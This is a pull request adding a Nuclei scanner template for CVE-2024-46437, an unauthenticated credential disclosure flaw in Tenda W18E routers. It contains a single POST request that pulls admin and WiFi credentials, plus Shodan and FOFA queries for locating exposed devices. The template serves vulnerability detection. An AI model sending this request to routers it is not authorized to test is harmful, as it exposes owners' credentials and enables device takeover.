### PR TITLE
Add CVE-2024-46437: Tenda W18E Unauthenticated Sensitive Information Disclosure

### DIFF
--- a/http/cves/2024/CVE-2024-46437.yaml
+++ b/http/cves/2024/CVE-2024-46437.yaml
@@ -1,0 +1,51 @@
+id: CVE-2024-46437
+
+info:
+  name: Tenda W18E - Unauthenticated Sensitive Information Disclosure
+  author: trader642
+  severity: medium
+  description: |
+    Tenda W18E V16.01.0.8(1625) is vulnerable to sensitive information disclosure via the getQuickCfgWifiAndLogin API endpoint. An unauthenticated remote attacker can retrieve the running configuration including the WiFi SSID, WiFi password, and administrator credentials (base64-encoded).
+  impact: |
+    An unauthenticated attacker can recover administrator credentials and WiFi passwords, leading to complete device takeover.
+  remediation: |
+    Update to the latest firmware version that restricts access to configuration endpoints, or restrict network access to the management portal.
+  reference:
+    - https://reddas.us/blog/tenda_w18e_security_research
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-46437
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 6.5
+    cve-id: CVE-2024-46437
+    cwe-id: CWE-306,CWE-261
+  metadata:
+    verified: true
+    max-request: 1
+    vendor: tenda
+    product: w18e
+    shodan-query: "Tenda W18E"
+    fofa-query: body="Tenda" && body="W18E"
+  tags: cve,cve2024,tenda,info-disclosure,exposure,router,iot
+
+http:
+  - raw:
+      - |
+        POST /goform/module HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        {"moduleName":"getQuickCfgWifiAndLogin"}
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "loginUserName"
+          - "loginUserPassword"
+          - "wifiSSID"
+        condition: and
+
+      - type: status
+        status:
+          - 200


### PR DESCRIPTION
## Description

Adds nuclei template for CVE-2024-46437 - Tenda W18E unauthenticated information disclosure vulnerability.

## Details
- **CVE**: CVE-2024-46437
- **CVSS**: 6.5 (Medium)
- **Product**: Tenda W18E V16.01.0.8(1625)
- **Type**: Unauthenticated information disclosure

## Detection Method
Non-destructive detection via POST to /goform/module with moduleName=getQuickCfgWifiAndLogin to retrieve admin credentials and WiFi config without authentication.

## References
- https://reddas.us/blog/tenda_w18e_security_research
- https://nvd.nist.gov/vuln/detail/CVE-2024-46437